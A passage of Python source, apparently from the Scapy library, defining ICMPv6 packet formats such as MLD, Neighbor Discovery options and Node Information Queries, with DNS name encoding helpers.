Packet Too Big" fields_desc = [ByteEnumField("type", 2, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("mtu", 1280)] class ICMPv6TimeExceeded(_ICMPv6Error): name = "ICMPv6 Time Exceeded" fields_desc = [ByteEnumField("type", 3, icmp6types), ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1: "fragment reassembly time exceeded"}), # noqa: E501 XShortField("cksum", None), ByteField("length", 0), X3BytesField("unused", 0)] # The default pointer value is set to the next header field of # the encapsulated IPv6 packet class ICMPv6ParamProblem(_ICMPv6Error): name = "ICMPv6 Parameter Problem" fields_desc = [ByteEnumField("type", 4, icmp6types), ByteEnumField( "code", 0, {0: "erroneous header field encountered", 1: "unrecognized Next Header type encountered", 2: "unrecognized IPv6 option encountered", 3: "first fragment has incomplete header chain"}), XShortField("cksum", None), IntField("ptr", 6)] class ICMPv6EchoRequest(_ICMPv6): name = "ICMPv6 Echo Request" fields_desc = [ByteEnumField("type", 128, icmp6types), ByteField("code", 0), XShortField("cksum", None), XShortField("id", 0), XShortField("seq", 0), StrField("data", "")] def mysummary(self): return self.sprintf("%name% (id: %id% seq: %seq%)") def hashret(self): return struct.pack("HH", self.id, self.seq) + self.payload.hashret() class ICMPv6EchoReply(ICMPv6EchoRequest): name = "ICMPv6 Echo Reply" type = 129 def answers(self, other): # We could match data content between request and reply. return (isinstance(other, ICMPv6EchoRequest) and self.id == other.id and self.seq == other.seq and self.data == other.data) # ICMPv6 Multicast Listener Discovery (RFC2710) # # tous les messages MLD sont emis avec une adresse source lien-locale # -> Y veiller dans le post_build si aucune n'est specifiee # La valeur de Hop-Limit doit etre de 1 # "and an IPv6 Router Alert option in a Hop-by-Hop Options # header. (The router alert option is necessary to cause routers to # examine MLD messages sent to multicast addresses in which the router # itself has no interest" class _ICMPv6ML(_ICMPv6): fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 0), ShortField("reserved", 0), IP6Field("mladdr", "::")] # general queries are sent to the link-scope all-nodes multicast # address ff02::1, with a multicast address field of 0 and a MRD of # [Query Response Interval] # Default value for mladdr is set to 0 for a General Query, and # overloaded by the user for a Multicast Address specific query # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Query" type = 130 mrd = 10000 # 10s for mrd mladdr = "::" overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Report" type = 131 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} def answers(self, query): """Check the query type""" return ICMPv6MLQuery in query # When a node ceases to listen to a multicast address on an interface, # it SHOULD send a single Done message to the link-scope all-routers # multicast address (FF02::2), carrying in its multicast address field # the address to which it is ceasing to listen # TODO : See what we can do to automatically include a Router Alert # Option in a Destination Option Header. class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 name = "MLD - Multicast Listener Done" type = 132 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} # Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Query" fields_desc = [ByteEnumField("type", 130, icmp6types), ByteField("code", 0), XShortField("cksum", None), ShortField("mrd", 10000), ShortField("reserved", 0), IP6Field("mladdr", "::"), BitField("Resv", 0, 4), BitField("S", 0, 1), BitField("QRV", 0, 3), ByteField("QQIC", 0), ShortField("sources_number", None), IP6ListField("sources", [], count_from=lambda pkt: pkt.sources_number)] # RFC8810 - 4. Message Formats overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'sources_number' field when needed""" if self.sources_number is None: srcnum = struct.pack("!H", len(self.sources)) packet = packet[:26] + srcnum + packet[28:] return _ICMPv6.post_build(self, packet, payload) class ICMPv6MLDMultAddrRec(Packet): name = "ICMPv6 MLDv2 - Multicast Address Record" fields_desc = [ByteField("rtype", 4), FieldLenField("auxdata_len", None, length_of="auxdata", fmt="B"), FieldLenField("sources_number", None, length_of="sources", adjust=lambda p, num: num // 16), IP6Field("dst", "::"), IP6ListField("sources", [], length_from=lambda p: 16 * p.sources_number), StrLenField("auxdata", "", length_from=lambda p: p.auxdata_len)] def default_payload_class(self, packet): """Multicast Address Record followed by another one""" return self.__class__ class ICMPv6MLReport2(_ICMPv6): # RFC 3810 name = "MLDv2 - Multicast Listener Report" fields_desc = [ByteEnumField("type", 143, icmp6types), ByteField("res", 0), XShortField("cksum", None), ShortField("reserved", 0), ShortField("records_number", None), PacketListField("records", [], ICMPv6MLDMultAddrRec, count_from=lambda p: p.records_number)] # RFC8810 - 4. Message Formats overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} def post_build(self, packet, payload): """Compute the 'records_number' field when needed""" if self.records_number is None: recnum = struct.pack("!H", len(self.records)) packet = packet[:6] + recnum + packet[8:] return _ICMPv6.post_build(self, packet, payload) def answers(self, query): """Check the query type""" return isinstance(query, ICMPv6MLQuery2) # ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # # TODO: # - 04/09/06 troglocan : find a way to automatically add a router alert # option for all MRD packets. This could be done in a specific # way when IPv6 is the under layer with some specific keyword # like 'exthdr'. This would allow to keep compatibility with # providing IPv6 fields to be overloaded in fields_desc. # # At the moment, if user inserts an IPv6 Router alert option # none of the IPv6 default values of IPv6 layer will be set. class ICMPv6MRD_Advertisement(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Advertisement" fields_desc = [ByteEnumField("type", 151, icmp6types), ByteField("advinter", 20), XShortField("cksum", None), ShortField("queryint", 0), ShortField("robustness", 0)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:8], s[8:] class ICMPv6MRD_Solicitation(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Solicitation" fields_desc = [ByteEnumField("type", 152, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] class ICMPv6MRD_Termination(_ICMPv6): name = "ICMPv6 Multicast Router Discovery Termination" fields_desc = [ByteEnumField("type", 153, icmp6types), ByteField("res", 0), XShortField("cksum", None)] overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} # IPv6 Router Alert requires manual inclusion def extract_padding(self, s): return s[:4], s[4:] # ICMPv6 Neighbor Discovery (RFC 2461) # icmp6ndopts = {1: "Source Link-Layer Address", 2: "Target Link-Layer Address", 3: "Prefix Information", 4: "Redirected Header", 5: "MTU", 6: "NBMA Shortcut Limit Option", # RFC2491 7: "Advertisement Interval Option", 8: "Home Agent Information Option", 9: "Source Address List", 10: "Target Address List", 11: "CGA Option", # RFC 3971 12: "RSA Signature Option", # RFC 3971 13: "Timestamp Option", # RFC 3971 14: "Nonce option", # RFC 3971 15: "Trust Anchor Option", # RFC 3971 16: "Certificate Option", # RFC 3971 17: "IP Address Option", # RFC 4068 18: "New Router Prefix Information Option", # RFC 4068 19: "Link-layer Address Option", # RFC 4068 20: "Neighbor Advertisement Acknowledgement Option", 21: "CARD Request Option", # RFC 4065/4066/4067 22: "CARD Reply Option", # RFC 4065/4066/4067 23: "MAP Option", # RFC 4140 24: "Route Information Option", # RFC 4191 25: "Recursive DNS Server Option", 26: "IPv6 Router Advertisement Flags Option" } icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 2: "ICMPv6NDOptDstLLAddr", 3: "ICMPv6NDOptPrefixInfo", 4: "ICMPv6NDOptRedirectedHdr", 5: "ICMPv6NDOptMTU", 6: "ICMPv6NDOptShortcutLimit", 7: "ICMPv6NDOptAdvInterval", 8: "ICMPv6NDOptHAInfo", 9: "ICMPv6NDOptSrcAddrList", 10: "ICMPv6NDOptTgtAddrList", # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py # 15: Do Me, # 16: Do Me, 17: "ICMPv6NDOptIPAddr", 18: "ICMPv6NDOptNewRtrPrefix", 19: "ICMPv6NDOptLLA", # 18: Do Me, # 19: Do Me, # 20: Do Me, # 21: Do Me, # 22: Do Me, 23: "ICMPv6NDOptMAP", 24: "ICMPv6NDOptRouteInfo", 25: "ICMPv6NDOptRDNSS", 26: "ICMPv6NDOptEFA", 31: "ICMPv6NDOptDNSSL" } icmp6ndraprefs = {0: "Medium (default)", 1: "High", 2: "Reserved", 3: "Low"} # RFC 4191 class _ICMPv6NDGuessPayload: name = "Dummy ND class that implements guess_payload_class()" def guess_payload_class(self, p): if len(p) > 1: return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501 # Beginning of ICMPv6 Neighbor Discovery Options. class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" fields_desc = [ByteField("type", None), FieldLenField("len", None, length_of="data", fmt="B", adjust=lambda pkt, x: x + 2), StrLenField("data", "", length_from=lambda pkt: pkt.len - 2)] # NOTE: len includes type and len field. Expressed in unit of 8 bytes # TODO: Revoir le coup du ETHER_ANY class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" fields_desc = [ByteField("type", 1), ByteField("len", 1), MACField("lladdr", ETHER_ANY)] def mysummary(self): return self.sprintf("%name% %lladdr%") class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" type = 2 class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ByteField("type", 3), ByteField("len", 4), ByteField("prefixlen", 64), BitField("L", 1, 1), BitField("A", 1, 1), BitField("R", 0, 1), BitField("res1", 0, 5), XIntField("validlifetime", 0xffffffff), XIntField("preferredlifetime", 0xffffffff), XIntField("res2", 0x00000000), IP6Field("prefix", "::")] def mysummary(self): return self.sprintf("%name% %prefix%/%prefixlen% " "On-link %L% Autonomous Address %A% " "Router Address %R%") # TODO: We should also limit the size of included packet to something # like (initiallen - 40 - 2) class TruncPktLenField(PacketLenField): __slots__ = ["cur_shift"] def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501 PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501 self.cur_shift = cur_shift def getfield(self, pkt, s): tmp_len = self.length_from(pkt) i = self.m2i(pkt, s[:tmp_len]) return s[tmp_len:], i def m2i(self, pkt, m): s = None try: # It can happen we have sth shorter than 40 bytes s = self.cls(m) except Exception: return conf.raw_layer(m) return s def i2m(self, pkt, x): s = raw(x) tmp_len = len(s) r = (tmp_len + self.cur_shift) % 8 tmp_len = tmp_len - r return s[:tmp_len] def i2len(self, pkt, i): return len(self.i2m(pkt, i)) # Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Redirected Header" fields_desc = [ByteField("type", 4), FieldLenField("len", None, length_of="pkt", fmt="B", adjust=lambda pkt, x:(x + 8) // 8), StrFixedLenField("res", b"\x00" * 6, 6), TruncPktLenField("pkt", b"", IPv6, 8, length_from=lambda pkt: 8 * pkt.len - 8)] # See which value should be used for default MTU instead of 1280 class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - MTU" fields_desc = [ByteField("type", 5), ByteField("len", 1), XShortField("res", 0), IntField("mtu", 1280)] def mysummary(self): return self.sprintf("%name% %mtu%") class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" fields_desc = [ByteField("type", 6), ByteField("len", 1), ByteField("shortcutlim", 40), # XXX ByteField("res1", 0), IntField("res2", 0)] class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Interval Advertisement" fields_desc = [ByteField("type", 7), ByteField("len", 1), ShortField("res", 0), IntField("advint", 0)] def mysummary(self): return self.sprintf("%name% %advint% milliseconds") class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery - Home Agent Information" fields_desc = [ByteField("type", 8), ByteField("len", 1), ShortField("res", 0), ShortField("pref", 0), ShortField("lifetime", 1)] def mysummary(self): return self.sprintf("%name% %pref% %lifetime% seconds") # type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support # type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" fields_desc = [ByteField("type", 17), ByteField("len", 3), ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 2: "New Care-Of Address", 3: "NAR's IP address"}), ByteField("plen", 64), IntField("res", 0), IP6Field("addr", "::")] class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 18), ByteField("len", 3), ByteField("optcode", 0), ByteField("plen", 64), IntField("res", 0), IP6Field("prefix", "::")] _rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 1: "LLA for the new AP", 2: "LLA of the MN", 3: "LLA of the NAR", 4: "LLA of the src of TrSolPr or PrRtAdv msg", 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 6: "No preifx info available for AP identified by the LLA", # noqa: E501 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 fields_desc = [ByteField("type", 19), ByteField("len", 1), ByteEnumField("optcode", 0, _rfc4068_lla_optcode), MACField("lla", ETHER_ANY)] # We only support ethernet class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 name = "ICMPv6 Neighbor Discovery - MAP Option" fields_desc = [ByteField("type", 23), ByteField("len", 3), BitField("dist", 1, 4), BitField("pref", 15, 4), # highest availability BitField("R", 1, 1), BitField("res", 0, 7), IntField("validlifetime", 0xffffffff), IP6Field("addr", "::")] class _IP6PrefixField(IP6Field): __slots__ = ["length_from"] def __init__(self, name, default): IP6Field.__init__(self, name, default) self.length_from = lambda pkt: 8 * (pkt.len - 1) def addfield(self, pkt, s, val): return s + self.i2m(pkt, val) def getfield(self, pkt, s): tmp_len = self.length_from(pkt) p = s[:tmp_len] if tmp_len < 16: p += b'\x00' * (16 - tmp_len) return s[tmp_len:], self.m2i(pkt, p) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def i2m(self, pkt, x): tmp_len = pkt.len if x is None: x = "::" if tmp_len is None: tmp_len = 1 x = inet_pton(socket.AF_INET6, x) if tmp_len is None: return x if tmp_len in [0, 1]: return b"" if tmp_len in [2, 3]: return x[:8 * (tmp_len - 1)] return x + b'\x00' * 8 * (tmp_len - 3) class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" fields_desc = [ByteField("type", 24), FieldLenField("len", None, length_of="prefix", fmt="B", adjust=lambda pkt, x: x // 8 + 1), ByteField("plen", None), BitField("res1", 0, 3), BitEnumField("prf", 0, 2, icmp6ndraprefs), BitField("res2", 0, 3), IntField("rtlifetime", 0xffffffff), _IP6PrefixField("prefix", None)] def mysummary(self): return self.sprintf("%name% %prefix%/%plen% Preference %prf%") class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" fields_desc = [ByteField("type", 25), FieldLenField("len", None, count_of="dns", fmt="B", adjust=lambda pkt, x: 2 * x + 1), ShortField("res", None), IntField("lifetime", 0xffffffff), IP6ListField("dns", [], length_from=lambda pkt: 8 * (pkt.len - 1))] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.dns)) class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" fields_desc = [ByteField("type", 26), ByteField("len", 1), BitField("res", 0, 48)] # As required in Sect 8. of RFC 3315, Domain Names must be encoded as # described in section 3.1 of RFC 1035 # XXX Label should be at most 63 octets in length : we do not enforce it # Total length of domain should be 255 : we do not enforce it either class DomainNameListField(StrLenField): __slots__ = ["padded"] islist = 1 padded_unit = 8 def __init__(self, name, default, fld=None, length_from=None, padded=False): # noqa: E501 self.padded = padded StrLenField.__init__(self, name, default, fld, length_from) def i2len(self, pkt, x): return len(self.i2m(pkt, x)) def m2i(self, pkt, x): x = plain_str(x) # Decode bytes to string res = [] while x: # Get a name until \x00 is reached cur = [] while x and ord(x[0]) != 0: tmp_len = ord(x[0]) cur.append(x[1:tmp_len + 1]) x = x[tmp_len + 1:] if self.padded: # Discard following \x00 in padded mode if len(cur): res.append(".".join(cur) + ".") else: # Store the current name res.append(".".join(cur) + ".") if x and ord(x[0]) == 0: x = x[1:] return res def i2m(self, pkt, x): def conditionalTrailingDot(z): if z and orb(z[-1]) == 0: return z return z + b'\x00' # Build the encode names tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) # In padded mode, add some \x00 bytes if self.padded and not len(ret_string) % self.padded_unit == 0: ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 return ret_string class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" fields_desc = [ByteField("type", 31), FieldLenField("len", None, length_of="searchlist", fmt="B", adjust=lambda pkt, x: 1 + x // 8), ShortField("res", None), IntField("lifetime", 0xffffffff), DomainNameListField("searchlist", [], length_from=lambda pkt: 8 * pkt.len - 8, padded=True) ] def mysummary(self): return self.sprintf("%name% " + ", ".join(self.searchlist)) # End of ICMPv6 Neighbor Discovery Options. class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Solicitation" fields_desc = [ByteEnumField("type", 133, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Neighbor Discovery - Router Advertisement" fields_desc = [ByteEnumField("type", 134, icmp6types), ByteField("code", 0), XShortField("cksum", None), ByteField("chlim", 0), BitField("M", 0, 1), BitField("O", 0, 1), BitField("H", 0, 1), BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 BitField("P", 0, 1), BitField("res", 0, 2), ShortField("routerlifetime", 1800), IntField("reachabletime", 0), IntField("retranstimer", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def answers(self, other): return isinstance(other, ICMPv6ND_RS) def mysummary(self): return self.sprintf("%name% Lifetime %routerlifetime% " "Hop Limit %chlim% Preference %prf% " "Managed %M% Other %O% Home %H%") class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" fields_desc = [ByteEnumField("type", 135, icmp6types), ByteField("code", 0), XShortField("cksum", None), IntField("res", 0), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" fields_desc = [ByteEnumField("type", 136, icmp6types), ByteField("code", 0), XShortField("cksum", None), BitField("R", 1, 1), BitField("S", 0, 1), BitField("O", 1, 1), XBitField("res", 0, 29), IP6Field("tgt", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} def mysummary(self): return self.sprintf("%name% (tgt: %tgt%)") def hashret(self): return bytes_encode(self.tgt) + self.payload.hashret() def answers(self, other): return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt # associated possible options : target link-layer option, Redirected header class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): name = "ICMPv6 Neighbor Discovery - Redirect" fields_desc = [ByteEnumField("type", 137, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("res", 0), IP6Field("tgt", "::"), IP6Field("dst", "::")] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # ICMPv6 Inverse Neighbor Discovery (RFC 3122) # class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" fields_desc = [ByteField("type", 9), FieldLenField("len", None, count_of="addrlist", fmt="B", adjust=lambda pkt, x: 2 * x + 1), StrFixedLenField("res", b"\x00" * 6, 6), IP6ListField("addrlist", [], length_from=lambda pkt: 8 * (pkt.len - 1))] class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" type = 10 # RFC3122 # Options requises : source lladdr et target lladdr # Autres options valides : source address list, MTU # - Comme precise dans le document, il serait bien de prendre l'adresse L2 # demandee dans l'option requise target lladdr et l'utiliser au niveau # de l'adresse destination ethernet si aucune adresse n'est precisee # - ca semble pas forcement pratique si l'utilisateur doit preciser toutes # les options. # Ether() must use the target lladdr as destination class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Solicitation" fields_desc = [ByteEnumField("type", 141, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} # Options requises : target lladdr, target address list # Autres options valides : MTU class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): name = "ICMPv6 Inverse Neighbor Discovery Advertisement" fields_desc = [ByteEnumField("type", 142, icmp6types), ByteField("code", 0), XShortField("cksum", None), XIntField("reserved", 0)] overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} ############################################################################### # ICMPv6 Node Information Queries (RFC 4620) ############################################################################### # [ ] Add automatic destination address computation using computeNIGroupAddr # in IPv6 class (Scapy6 modification when integrated) if : # - it is not provided # - upper layer is ICMPv6NIQueryName() with a valid value # [ ] Try to be liberal in what we accept as internal values for _explicit_ # DNS elements provided by users. Any string should be considered # valid and kept like it has been provided. At the moment, i2repr() will # crash on many inputs # [ ] Do the documentation # [ ] Add regression tests # [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 # [ ] Check if there are differences between different stacks. Among *BSD, # with others. # [ ] Deal with flags in a consistent way. # [ ] Implement compression in names2dnsrepr() and decompresiion in # dnsrepr2names(). Should be deactivable. icmp6_niqtypes = {0: "NOOP", 2: "Node Name", 3: "IPv6 Address", 4: "IPv4 Address"} class _ICMPv6NIHashret: def hashret(self): return bytes_encode(self.nonce) class _ICMPv6NIAnswers: def answers(self, other): return self.nonce == other.nonce # Buggy; always returns the same value during a session class NonceField(StrFixedLenField): def __init__(self, name, default=None): StrFixedLenField.__init__(self, name, default, 8) if default is None: self.default = self.randval() @conf.commands.register def computeNIGroupAddr(name): """Compute the NI group Address. Can take a FQDN as input parameter""" name = name.lower().split(".")[0] record = chr(len(name)) + name h = md5(record.encode("utf8")) h = h.digest() addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) return addr # Here is the deal. First, that protocol is a piece of shit. Then, we # provide 4 classes for the different kinds of Requests (one for every # valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same # data field class that is made to be smart by guessing the specific # type of value provided : # # - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, # if not overridden by user # - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, # if not overridden # - Name in the other cases: code is set to 0, if not overridden by user # # Internal storage, is not only the value, but the a pair providing # the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) # # Note : I merged getfield() and m2i(). m2i() should not be called # directly anyway. Same remark for addfield() and i2m() # # -- arno # "The type of information present in the Data field of a query is # declared by the ICMP Code, whereas the type of information in a # Reply is determined by the Qtype" def names2dnsrepr(x): """ Take as input a list of DNS names or a single DNS name and encode it in DNS format (with possible compression) If a string that is already a DNS name in DNS format is passed, it is returned unmodified. Result is a string. !!! At the moment, compression is not implemented !!! """ if isinstance(x, bytes): if x and x[-1:] == b'\x00': # stupid heuristic return x x = [x] res = [] for n in x: termin = b"\x00" if n.count(b'.') == 0: # single-component gets one more termin += b'\x00' n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin res.append(n) return b"".join(res) def dnsrepr2names(x): """ Take as input a DNS encoded string (possibly compressed) and returns a list of DNS names contained in it. If provided string is already in printable format (does not end with a null character, a one element list is returned). Result is a list. """ res = [] cur = b"" while x: tmp_len = orb(x[0]) x = x[1:] if not tmp_len: if cur and cur[-1:] == b'.': cur = cur[:-1] res.append(cur) cur = b"" if x and orb(x[0]) == 0: # single component x = x[1:] continue if tmp_len & 0xc0: # XXX TODO : work on that -- arno raise Exception("DNS message can't be compressed at this point!") cur += x[:tmp_len] + b"." x = x[tmp_len:] return res class NIQueryDataField(StrField): def __init__(self, name, default): StrField.__init__(self, name, default) def i2h(self, pkt, x): if x is None: return x t, val = x if t == 1: val = dnsrepr2names(val)[0] return val def h2i(self, pkt, x): if x is tuple and isinstance(x[0], int): return x # Try IPv6 try: inet_pton(socket.AF_INET6, x.decode()) return (0, x.decode()) except Exception: pass # Try IPv4 try: inet_pton(socket.AF_INET, x.decode()) return (2, x.decode()) except Exception: pass # Try DNS if x is None: x = b"" x = names2dnsrepr(x) return (1, x) def i2repr(self, pkt, x): t, val = x if t == 1: # DNS Name # we don't use dnsrepr2names() to deal with # possible weird data extracted info res = [] while val: tmp_len = orb(val[0]) val = val[1:] if tmp_len == 0: break res.append(plain_str(val[:tmp_len]) + ".") val = val[tmp_len:] tmp = "".join(res) if tmp and tmp[-1] == '.': tmp = tmp[:-1] return tmp return repr(val) def getfield(self, pkt, s): qtype = getattr(pkt, "qtype") if qtype == 0: # NOOP return s, (0, b"") else: code = getattr(pkt, "code") if code == 0: # IPv6 Addr return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) elif code == 2: # IPv4 Addr return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) else: # Name or Unknown return b"", (1, s) def addfield(self, pkt, s, val): if ((isinstance(val, tuple) and val[1] is None) or val is None): val = (1, b"") t = val[0] if t == 1: return s + val[1] elif t == 0: return s + inet_pton(socket.AF_INET6, val[1]) else: return s + inet_pton(socket.AF_INET, val[1]) class NIQueryCodeField(ByteEnumField): def i2m(self, pkt, x): if x is None: d = pkt.getfieldval("data") if d is None: return 1 elif d[0] == 0: # IPv6 address return 0 elif d[0] == 1: # Name return 1 elif d[0] == 2: # IPv4 address return 2 else: return 1 return x _niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} # _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", # 8: "Link-local addresses", 16: "Site-local addresses", # 32: "Global addresses" } # "This NI type has no defined flags and never has a Data Field". Used # to know if the destination is up and implements NI protocol. class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): name = "ICMPv6 Node Information Query - NOOP Query" fields_desc = [ByteEnumField("type", 139, icmp6types), NIQueryCodeField("code", None, _niquery_code), XShortField("cksum", None), ShortEnumField("qtype", 0, icmp6_niqtypes), BitField("unused", 0, 10), FlagsField("flags", 0, 6, "TACLSG"), NonceField("nonce", None), NIQueryDataField("data", None)] class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Name Query" qtype = 2 # We ask for the IPv6 address of the peer class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv6 Address Query" qtype = 3 flags = 0x3E class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): name = "ICMPv6 Node Information Query - IPv4 Address Query" qtype = 4 _nireply_code = {0: "Successful Reply", 1: "Response Refusal", 3: "Unknown query type"} _nireply_flags = {1: "Reply set incomplete", 2: "All unicast addresses", 4: "IPv4 addresses", 8: "Link-local addresses", 16: "Site-local addresses", 32: "Global addresses"} # Internal repr is one of those : # (0, "some string") : unknown qtype value are mapped to that one # (3, [ (ttl, ip6), ... ]) # (4, [ (ttl, ip4), ... 